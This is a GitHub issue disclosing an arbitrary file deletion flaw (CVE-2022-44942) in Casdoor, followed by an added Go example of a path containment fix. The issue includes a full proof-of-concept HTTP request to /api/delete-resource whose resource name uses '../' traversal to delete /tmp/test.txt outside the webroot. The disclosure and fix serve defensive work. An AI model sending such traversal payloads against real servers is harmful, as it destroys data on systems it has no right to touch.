CVE-2022-44942: Arbitrary file delete vulnerability · Issue #1171 · casdoor/casdoor
Casdoor before v1.126.1 was discovered to contain an arbitrary file deletion vulnerability via the uploadFile function.
Hi,
I was looking at the fix to #1035:
And I noticed it only fixes the path traversal in file upload, while file deletion is still vulnerable.
Thus, it’s possible to delete any file outside the application’s webroot:
POC request:

```http
POST /api/delete-resource?provider= HTTP/1.1
Host: localhost:8008
Content-Length: 363
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://localhost:8008
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8008/resources
Accept-Encoding: gzip, deflate
Accept-Language: en,pl-PL;q=0.9,pl;q=0.8,en-US;q=0.7
Cookie: casdoor_session_id=93862e25f31761d7cde831cdf4b93f14; Hm_lvt_5998fcd123c220efc0936edf4f250504=1664531159; Hm_lpvt_5998fcd123c220efc0936edf4f250504=1664531383
Connection: close

{"owner":"built-in","name":"/avatar/../../tmp/test.txt","createdTime":"2022-09-30T09:49:17Z","user":"admin","provider":"app-built-in","application":"app-built-in","tag":"avatar","parent":"CropperDiv","fileName":"admin.jpeg","fileType":"image","fileFormat":".jpeg","fileSize":159547,"url":"/files/avatar/built-in/admin.jpeg?t=1664531357206668083","description":""}
```
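The report's point is that the traversal check was applied to upload but not to deletion. The following is an added example, not part of the original issue and not Casdoor's code: a single containment check that any delete (or upload) path can share. The names `SafeResourcePath`, `DeleteResource` and the storage root are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// ErrOutsideRoot reports a resource name that resolves outside the storage root.
var ErrOutsideRoot = errors.New("resource path escapes storage root")

// SafeResourcePath (hypothetical helper, not a Casdoor function) joins a
// client-supplied name onto root and returns it only if it stays inside root.
// The check is lexical: symlinks under root are not resolved.
func SafeResourcePath(root, name string) (string, error) {
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	candidate := filepath.Join(absRoot, name) // Join also cleans "." and ".."
	rel, err := filepath.Rel(absRoot, candidate)
	if err != nil {
		return "", err
	}
	if rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideRoot
	}
	return candidate, nil
}

// DeleteResource runs the same check an upload path would use before removing.
func DeleteResource(root, name string) error {
	p, err := SafeResourcePath(root, name)
	if err != nil {
		return err
	}
	return os.Remove(p)
}

func main() {
	root := "/srv/casdoor/files" // constructed storage root, an assumption
	for _, name := range []string{"/avatar/built-in/admin.jpeg", "/avatar/../../tmp/test.txt"} {
		p, err := SafeResourcePath(root, name)
		fmt.Printf("%q -> %q, err=%v\n", name, p, err)
	}
}
```

Routing every file operation on a resource through one such helper avoids the situation described here, where one code path is fixed and a sibling path is left unchecked.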
Related news
GHSA-f93f-55c2-8c89: Casdoor arbitrary file deletion vulnerability via uploadFile function